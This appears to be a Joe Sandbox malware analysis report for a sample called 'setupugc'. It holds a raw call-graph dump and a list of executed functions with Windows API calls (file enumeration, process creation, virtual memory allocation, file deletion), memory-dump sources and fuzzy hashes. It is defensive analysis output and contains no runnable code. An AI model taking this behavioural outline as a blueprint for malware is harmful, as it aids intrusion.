98612->98614 98616 cf7e34 98612->98616 98613 cf7e41 98615 d092d0 NtClose 98613->98615 98617 cf7e5d 98613->98617 98614->98616 98618 cf7e53 98615->98618 98616->98595 98617->98595 98618->98595 98642 d095e0 98619->98642 98621 d0b46b 98621->98598 98623 cf4494 98622->98623 98624 cf449b 98623->98624 98625 cf44d0 LdrLoadDll 98623->98625 98624->98606 98625->98624 98627 d07ee2 98626->98627 98629 d07eef 98627->98629 98645 cf1c40 98627->98645 98629->98596 98630->98605 98632 cf7cda 98631->98632 98636 cf7db6 98631->98636 98637 d089a0 98632->98637 98635 d092d0 NtClose 98635->98636 98636->98612 98636->98613 98638 d089bd 98637->98638 98641 36a35c0 LdrInitializeThunk 98638->98641 98639 cf7daa 98639->98635 98641->98639 98643 d095fd 98642->98643 98644 d0960e RtlAllocateHeap 98643->98644 98644->98621 98661 cf80a0 98645->98661 98647 cf21a5 98647->98629 98648 cf1c60 98648->98647 98665 d01070 98648->98665 98651 cf1e6f 98673 d0c660 98651->98673 98652 cf1cbb 98652->98647 98668 d0c530 98652->98668 98655 cf1e84 98657 cf1ed1 98655->98657 98679 cf0770 98655->98679 98657->98647 98658 cf0770 LdrInitializeThunk 98657->98658 98682 cf8040 98657->98682 98658->98657 98659 cf2023 98659->98657 98660 cf8040 LdrInitializeThunk 98659->98660 98660->98659 98662 cf80ad 98661->98662 98663 cf80ce SetErrorMode 98662->98663 98664 cf80d5 98662->98664 98663->98664 98664->98648 98686 d0b2e0 98665->98686 98667 d01091 98667->98652 98669 d0c540 98668->98669 98670 d0c546 98668->98670 98669->98651 98671 d0b450 RtlAllocateHeap 98670->98671 98672 d0c56c 98671->98672 98672->98651 98674 d0c5d0 98673->98674 98675 d0b450 RtlAllocateHeap 98674->98675 98676 d0c62d 98674->98676 98677 d0c60a 98675->98677 98676->98655 98678 d0b370 RtlFreeHeap 98677->98678 98678->98676 98680 cf0792 98679->98680 98693 d09550 98679->98693 98680->98659 98683 cf8053 98682->98683 98698 d08800 98683->98698 98685 cf807e 98685->98657 98689 d09430 98686->98689 98688 d0b311 98688->98667 98690 d094c5 98689->98690 98692 d0945b 98689->98692 98691 d094db NtAllocateVirtualMemory 98690->98691 98691->98688 98692->98688 98694 d0956d 98693->98694 98697 36a2c70 LdrInitializeThunk 98694->98697 98695 d09595 98695->98680 98697->98695 98699 d08881 98698->98699 98701 d0882e 98698->98701 98703 36a2dd0 LdrInitializeThunk 98699->98703 98700 d088a6 98700->98685 98701->98685 98703->98700 98704 cf5ac0 98705 cf8040 LdrInitializeThunk 98704->98705 98706 cf5af0 98705->98706 98709 cf7fc0 98706->98709 98708 cf5b15 98710 cf8004 98709->98710 98711 cf8025 98710->98711 98716 d085d0 98710->98716 98711->98708 98713 cf8015 98714 cf8031 98713->98714 98715 d092d0 NtClose 98713->98715 98714->98708 98715->98711 98717 d08650 98716->98717 98718 d085fe 98716->98718 98721 36a4650 LdrInitializeThunk 98717->98721 98718->98713 98719 d08675 98719->98713 98721->98719 98722 cfac80 98727 cfa990 98722->98727 98724 cfac8d 98741 cfa610 98724->98741 98726 cfaca9 98728 cfa9b5 98727->98728 98752 cf82b0 98728->98752 98731 cfab03 98731->98724 98733 cfab1a 98733->98724 98734 cfab11 98734->98733 98736 cfac07 98734->98736 98771 cfa060 98734->98771 98738 cfac6a 98736->98738 98780 cfa3d0 98736->98780 98739 d0b370 RtlFreeHeap 98738->98739 98740 cfac71 98739->98740 98740->98724 98742 cfa622 98741->98742 98749 cfa62d 98741->98749 98743 d0b450 RtlAllocateHeap 98742->98743 98743->98749 98744 cfa650 98744->98726 98745 cf82b0 GetFileAttributesW 98745->98749 98746 cfa962 98747 cfa977 98746->98747 98748 d0b370 RtlFreeHeap 98746->98748 98747->98726 98748->98747 98749->98744 98749->98745 98749->98746 98750 cfa060 RtlFreeHeap 98749->98750 98751 cfa3d0 RtlFreeHeap 98749->98751 98750->98749 98751->98749 98753 cf82d1 98752->98753 98754 cf82e3 98753->98754 98755 cf82d8 GetFileAttributesW 98753->98755 98754->98731 98756 d032c0 98754->98756 98755->98754 98757 d032ce 98756->98757 98758 d032d5 98756->98758 98757->98734 98759 cf4470 LdrLoadDll 98758->98759 98760 d0330a 98759->98760 98761 d03319 98760->98761 98784 d02d80 LdrLoadDll 98760->98784 98763 d0b450 RtlAllocateHeap 98761->98763 98767 d034c4 98761->98767 98764 d03332 98763->98764 98765 d034ba 98764->98765 98764->98767 98768 d0334e 98764->98768 98766 d0b370 RtlFreeHeap 98765->98766 98765->98767 98766->98767 98767->98734 98768->98767 98769 d0b370 RtlFreeHeap 98768->98769 98770 d034ae 98769->98770 98770->98734 98772 cfa086 98771->98772 98785 cfdaa0 98772->98785 98774 cfa0f8 98776 cfa280 98774->98776 98778 cfa116 98774->98778 98775 cfa265 98775->98734 98776->98775 98777 cf9f20 RtlFreeHeap 98776->98777 98777->98776 98778->98775 98790 cf9f20 98778->98790 98781 cfa3f6 98780->98781 98782 cfdaa0 RtlFreeHeap 98781->98782 98783 cfa47d 98782->98783 98783->98736 98784->98761 98786 cfdac4 98785->98786 98787 cfdace 98786->98787 98788 d0b370 RtlFreeHeap 98786->98788 98787->98774 98789 cfdb11 98788->98789 98789->98774 98791 cf9f3d 98790->98791 98794 cfdb20 98791->98794 98793 cfa043 98793->98778 98795 cfdb44 98794->98795 98796 cfdbee 98795->98796 98797 d0b370 RtlFreeHeap 98795->98797 98796->98793 98797->98796 98798 cf7080 98799 cf709c 98798->98799 98803 cf70ef 98798->98803 98801 d092d0 NtClose 98799->98801 98799->98803 98800 cf7224 98802 cf70b7 98801->98802 98808 cf6460 NtClose LdrInitializeThunk LdrInitializeThunk 98802->98808 98803->98800 98809 cf6460 NtClose LdrInitializeThunk LdrInitializeThunk 98803->98809 98805 cf71fe 98805->98800 98810 cf6630 NtClose LdrInitializeThunk LdrInitializeThunk 98805->98810 98808->98803 98809->98805 98810->98800 98811 cf21c0 98812 d08900 LdrInitializeThunk 98811->98812 98813 cf21f6 98812->98813 98816 d09360 98813->98816 98815 cf220b 98817 d093f2 98816->98817 98818 d0938e 98816->98818 98821 36a2e80 LdrInitializeThunk 98817->98821 98818->98815 98819 d09423 98819->98815 98821->98819 98822 cf2698 98823 cf26b5 98822->98823 98826 cf61d0 98823->98826 98825 cf26c0 98827 cf6203 98826->98827 98828 cf6227 98827->98828 98833 d08e40 98827->98833 98828->98825 98830 cf624a 98830->98828 98831 d092d0 NtClose 98830->98831 98832 cf62ca 98831->98832 98832->98825 98834 d08e5a 98833->98834 98837 36a2ca0 LdrInitializeThunk 98834->98837 98835 d08e86 98835->98830 98837->98835 98839 ceb490 98840 d0b2e0 NtAllocateVirtualMemory 98839->98840 98841 cecb01 98839->98841 98840->98841 98842 d088b0 98843 d088cd 98842->98843 98846 36a2df0 LdrInitializeThunk 98843->98846 98844 d088f5 98846->98844 98847 d00070 98848 d0008d 98847->98848 98849 cf4470 LdrLoadDll 98848->98849 98850 d000ab 98849->98850 98851 d09230 98852 d092a7 98851->98852 98853 d0925b 98851->98853 98854 d092bd NtDeleteFile 98852->98854 98855 d01a30 98860 d01a49 98855->98860 98856 d01ad9 98857 d01a91 98858 d0b370 RtlFreeHeap 98857->98858 98859 d01aa1 98858->98859 98860->98856 98860->98857 98861 d01ad4 98860->98861 98862 d0b370 RtlFreeHeap 98861->98862 98862->98856 98863 d05fb0 98864 d0600a 98863->98864 98866 d06017 98864->98866 98867 d039d0 98864->98867 98868 d0b2e0 NtAllocateVirtualMemory 98867->98868 98869 d03a11 98868->98869 98870 cf4470 LdrLoadDll 98869->98870 98872 d03b1e 98869->98872 98873 d03a57 98870->98873 98871 d03aa0 Sleep 98871->98873 98872->98866 98873->98871 98873->98872 98874 d08730 98875 d087c2 98874->98875 98877 d0875e 98874->98877 98879 36a2ee0 LdrInitializeThunk 98875->98879 98876 d087f3 98879->98876 98880 d01231 98892 d09140 98880->98892 98882 d01252 98883 d01270 98882->98883 98884 d01285 98882->98884 98885 d092d0 NtClose 98883->98885 98886 d092d0 NtClose 98884->98886 98887 d01279 98885->98887 98889 d0128e 98886->98889 98888 d012c5 98889->98888 98890 d0b370 RtlFreeHeap 98889->98890 98891 d012b9 98890->98891 98893 d091e7 98892->98893 98895 d0916b 98892->98895 98894 d091fd NtReadFile 98893->98894 98894->98882 98895->98882 98896 ce9ba0 98897 ce9baf 98896->98897 98898 ce9bf0 98897->98898 98899 ce9bdd CreateThread 98897->98899 98900 cf0ce0 98901 cf0ce1 98900->98901 98902 cf4470 LdrLoadDll 98901->98902 98903 cf0d18 98902->98903 98904 cf0d4c PostThreadMessageW 98903->98904 98905 cf0d5d 98903->98905 98904->98905 98906 cf6ca0 98907 cf6cca 98906->98907 98910 cf7e70 98907->98910 98909 cf6cf4 98911 cf7e8d 98910->98911 98917 d089f0 98911->98917 98913 cf7edd 98914 cf7ee4 98913->98914 98922 d08ad0 98913->98922 98914->98909 98916 cf7f0d 98916->98909 98918 d08a8b 98917->98918 98920 d08a1b 98917->98920 98927 36a2f30 LdrInitializeThunk 98918->98927 98919 d08ac4 98919->98913 98920->98913 98923 d08b84 98922->98923 98924 d08b02 98922->98924 98928 36a2d10 LdrInitializeThunk 98923->98928 98924->98916 98925 d08bc9 98925->98916 98927->98919 98928->98925 98929 cf7260 98930 cf7278 98929->98930 98932 cf72d2 98929->98932 98930->98932 98933 cfb1b0 98930->98933 98934 cfb1d6 98933->98934 98935 cfb409 98934->98935 98960 d096c0 98934->98960 98935->98932 98937 cfb24c 98937->98935 98938 d0c660 2 API calls 98937->98938 98939 cfb26b 98938->98939 98939->98935 98940 cfb342 98939->98940 98941 d08900 LdrInitializeThunk 98939->98941 98943 cf5a40 LdrInitializeThunk 98940->98943 98945 cfb361 98940->98945 98942 cfb2cd 98941->98942 98942->98940 98948 cfb2d6 98942->98948 98943->98945 98944 cfb32a 98946 cf8040 LdrInitializeThunk 98944->98946 98949 cfb3f1 98945->98949 98967 d08470 98945->98967 98952 cfb338 98946->98952 98947 cfb308 98982 d046c0 LdrInitializeThunk 98947->98982 98948->98935 98948->98944 98948->98947 98963 cf5a40 98948->98963 98953 cf8040 LdrInitializeThunk 98949->98953 98952->98932 98956 cfb3ff 98953->98956 98955 cfb3c8 98972 d08520 98955->98972 98956->98932 98958 cfb3e2 98977 d08680 98958->98977 98961 d096dd 98960->98961 98962 d096ee CreateProcessInternalW 98961->98962 98962->98937 98964 cf5a55 98963->98964 98965 d08ad0 LdrInitializeThunk 98964->98965 98966 cf5a7e 98965->98966 98966->98947 98968 d084f0 98967->98968 98970 d0849e 98967->98970 98983 36a39b0 LdrInitializeThunk 98968->98983 98969 d08515 98969->98955 98970->98955 98973 d0859d 98972->98973 98974 d0854b 98972->98974 98984 36a4340 LdrInitializeThunk 98973->98984 98974->98958 98975 d085c2 98975->98958 98978 d08700 98977->98978 98979 d086ae 98977->98979 98985 36a2fb0 LdrInitializeThunk 98978->98985 98979->98949 98980 d08725 98980->98949 98982->98944 98983->98969 98984->98975 98985->98980 98986 cfc520 98988 cfc549 98986->98988 98987 cfc64d 98988->98987 98989 cfc5f3 FindFirstFileW 98988->98989 98989->98987 98990 cfc60e 98989->98990 98991 cfc634 FindNextFileW 98990->98991 98991->98990 98992 cfc646 FindClose 98991->98992 98992->98987 99003 d016a0 99004 d016bc 99003->99004 99005 d016e4 99004->99005 99006 d016f8 99004->99006 99007 d092d0 NtClose 99005->99007 99008 d092d0 NtClose 99006->99008 99009 d016ed 99007->99009 99010 d01701 99008->99010 99013 d0b490 RtlAllocateHeap 99010->99013 99012 d0170c 99013->99012 99014 36a2ad0 LdrInitializeThunk 99015 cf3033 99016 cf7cc0 2 API calls 99015->99016 99017 cf3043 99016->99017 99018 d092d0 NtClose 99017->99018 99019 cf305f 99017->99019 99018->99019 99020 cff770 99021 cff7d4 99020->99021 99022 cf61d0 2 API calls 99021->99022 99024 cff907 99022->99024 99023 cff90e 99024->99023 99049 cf62e0 99024->99049 99026 cffab3 99027 cff98a 99027->99026 99028 cffac2 99027->99028 99053 cff550 99027->99053 99029 d092d0 NtClose 99028->99029 99031 cffacc 99029->99031 99032 cff9c6 99032->99028 99033 cff9d1 99032->99033 99034 d0b450 RtlAllocateHeap 99033->99034 99035 cff9fa 99034->99035 99036 cffa19 99035->99036 99037 cffa03 99035->99037 99062 cff440 CoInitialize 99036->99062 99039 d092d0 NtClose 99037->99039 99041 cffa0d 99039->99041 99040 cffa27 99065 d08da0 99040->99065 99043 cffaa2 99044 d092d0 NtClose 99043->99044 99045 cffaac 99044->99045 99046 d0b370 RtlFreeHeap 99045->99046 99046->99026 99047 cffa45 99047->99043 99048 d08da0 LdrInitializeThunk 99047->99048 99048->99047 99050 cf6305 99049->99050 99069 d08c20 99050->99069 99054 cff56c 99053->99054 99055 cf4470 LdrLoadDll 99054->99055 99057 cff58a 99055->99057 99056 cff593 99056->99032 99057->99056 99058 cf4470 LdrLoadDll 99057->99058 99059 cff65e 99058->99059 99060 cf4470 LdrLoadDll 99059->99060 99061 cff6b8 99059->99061 99060->99061 99061->99032 99063 cff4a5 99062->99063 99064 cff53b CoUninitialize 99063->99064 99064->99040 99066 d08dba 99065->99066 99074 36a2ba0 LdrInitializeThunk 99066->99074 99067 d08dea 99067->99047 99070 d08c3a 99069->99070 99073 36a2c60 LdrInitializeThunk 99070->99073 99071 cf6379 99071->99027 99073->99071 99074->99067 99075 cf8730 99076 cf8721 99075->99076 99077 cf8735 99075->99077 99077->99076 99079 cf6ec0 LdrInitializeThunk LdrInitializeThunk 99077->99079 99079->99076

                Executed Functions

                Function 00CFC520 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,00000000), ref: 00CFC604
                • FindNextFileW.KERNEL32(?,00000010), ref: 00CFC63F
                • FindClose.KERNEL32(?), ref: 00CFC64A
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                • Instruction ID: 37b5d5c8614b01af940c1b4c2f1b48a628d46045c77302fb4a88f4cd998f20cd
                • Opcode Fuzzy Hash: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                • Instruction Fuzzy Hash: F031A171A0020CBBDB61DB64CD85FFF777CDF44744F144498BA18A7181EA70AB848BA1
                Function 00D08FD0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                Download Yara Rule
                APIs
                • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 00D090CE
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                • Instruction ID: 56c20cca11b92454124b06ba841fc3dd41e3e8f3a142d859ac00d859f05c2427
                • Opcode Fuzzy Hash: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                • Instruction Fuzzy Hash: 8E31C5B5A00648AFCB14DF99D881EEFB7F9EF88304F104219F919A7384D770A951CBA1
                Function 00D09140 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                Download Yara Rule
                APIs
                • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 00D09226
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                • Instruction ID: 24f574e3ce0e5e656106284997cb1766ef8fcc904170a302efd35e75bb990bf6
                • Opcode Fuzzy Hash: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                • Instruction Fuzzy Hash: A03107B5A00248ABDB14DF98D841EEFB7F9EF88304F108219FD09A7384D774A911CBA1
                Function 00D09430 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(00CF1CBB,?,00D07EEF,00000000,4A9873AC,00003000,?,?,?,?,?,00D07EEF,00CF1CBB), ref: 00D094F8
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                • Instruction ID: d085970dff47c3165eb5ec05329accb79df958280cd75401d2ffb97d5fa202c3
                • Opcode Fuzzy Hash: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                • Instruction Fuzzy Hash: CB2106B5A00249AFDB14DF98DC41FAFB7B9EF88304F104519FD08AB285D774AA118BA1
                Function 00D09230 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                • Instruction ID: 46998a45326837bb5cdf75b2bcdfee60f5dc94e505f75d6fa4488f68caaa35ba
                • Opcode Fuzzy Hash: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                • Instruction Fuzzy Hash: 18118C71A007086BD721EA689C02FAFB3ACEB84314F004109F908A7281EB716A018BB1
                Function 00D092D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule
                APIs
                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00D09304
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction ID: 7c46831c7235ce4ab049bf847dbfd125a35d0dec64014a62898ebdc54a481ac0
                • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction Fuzzy Hash: 6EE046362106147BD220BA6ACC01F9B77ACEBC5714F008419FA18A7281C672BA1087B4
                Function 036A4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 817cb8341f6842370f07dfa1432b8248e35bfc8636d9385b23ecee29a0bb2674
                • Instruction ID: d8043329acf0c472dfce48373bb2c545ef9232d576e73035c2714355ba86c85f
                • Opcode Fuzzy Hash: 817cb8341f6842370f07dfa1432b8248e35bfc8636d9385b23ecee29a0bb2674
                • Instruction Fuzzy Hash: D890023160584452D140B5584C84586401997E0301B55C011E0425754D8B548A965B61
                Function 036A4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 04806780ce68feadf8e567ef97941be7bb340165d9e7fd1a3458644b2a2d5a7c
                • Instruction ID: 7676d6ada120bb0f1da0a082b87a6868eb323d2aafabe47166347d97ee41d34f
                • Opcode Fuzzy Hash: 04806780ce68feadf8e567ef97941be7bb340165d9e7fd1a3458644b2a2d5a7c
                • Instruction Fuzzy Hash: 4D900261601544828140B5584C04446601997E1301395C115A0555760D875889959B69
                Function 036A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0889c38f57cdca93f0c6e83b235224ca9d8ba7c38351342421ae79908a7e0f26
                • Instruction ID: 0d5fa746a186833e1a2480ab917f9d148d28c114fbf6a6d0f952f595da6583da
                • Opcode Fuzzy Hash: 0889c38f57cdca93f0c6e83b235224ca9d8ba7c38351342421ae79908a7e0f26
                • Instruction Fuzzy Hash: 92900261202444438105B5584814656401E87E0201B55C021E1015790EC66589D16A25
                Function 036A2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b89266965f5d0ebc9b0b11f70d7601aae972ab0c064d97ac434945fc069f5eff
                • Instruction ID: 8753d50cd954f3e9b15705af84bd54c028380360970b7f699eb87e76c5e0875d
                • Opcode Fuzzy Hash: b89266965f5d0ebc9b0b11f70d7601aae972ab0c064d97ac434945fc069f5eff
                • Instruction Fuzzy Hash: 2E90023120548C82D140B5584804A86002987D0305F55C011A0065794E97658E95BF61
                Function 036A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b3f63ef0a37da2ecdda6508081d9b42f529e3ba4ce9dfde4d3af6c9b0c4612b9
                • Instruction ID: a143829bb6b59884d006a5b1c0c4119eb701d84ece4d6b287f2c14d27da94ec6
                • Opcode Fuzzy Hash: b3f63ef0a37da2ecdda6508081d9b42f529e3ba4ce9dfde4d3af6c9b0c4612b9
                • Instruction Fuzzy Hash: 0790023120144C42D180B558480468A001987D1301F95C015A0026754ECB558B997FA1
                Function 036A2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b1847db42be8a150f63c809b7c238aa7a1fcf8b11bcd55f239eb7ef15836e4bc
                • Instruction ID: dcc4d287a051ccfdd3b4c4b8c06b4d4002730e2273be42ed74d308ed0e51561f
                • Opcode Fuzzy Hash: b1847db42be8a150f63c809b7c238aa7a1fcf8b11bcd55f239eb7ef15836e4bc
                • Instruction Fuzzy Hash: FF90023160544C42D150B5584814786001987D0301F55C011A0025754E87958B957FA1
                Function 036A2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 9464ea59d913654e004001f6f4e87e3e9f31ffad7844216015fe0acddb2d822f
                • Instruction ID: 8dcc9f4220ffbbc7ef590a4171b3c00af909ddce3c54f0384d0f401d54663acc
                • Opcode Fuzzy Hash: 9464ea59d913654e004001f6f4e87e3e9f31ffad7844216015fe0acddb2d822f
                • Instruction Fuzzy Hash: B3900225221444424145F9580A0454B045997D6351395C015F1417790DC76189A55B21
                Function 036A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7e30aec4228d24626c4987968fd4e4256ce15de7acf30bb84ae40d30377a9933
                • Instruction ID: b0022bb5b37e0c35efa8b8e51c8ffef0406405f1f4a46d9d28a7867f29ee853c
                • Opcode Fuzzy Hash: 7e30aec4228d24626c4987968fd4e4256ce15de7acf30bb84ae40d30377a9933
                • Instruction Fuzzy Hash: B7900225211444434105F9580B04547005A87D5351355C021F1016750DD76189A15A21
                Function 036A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
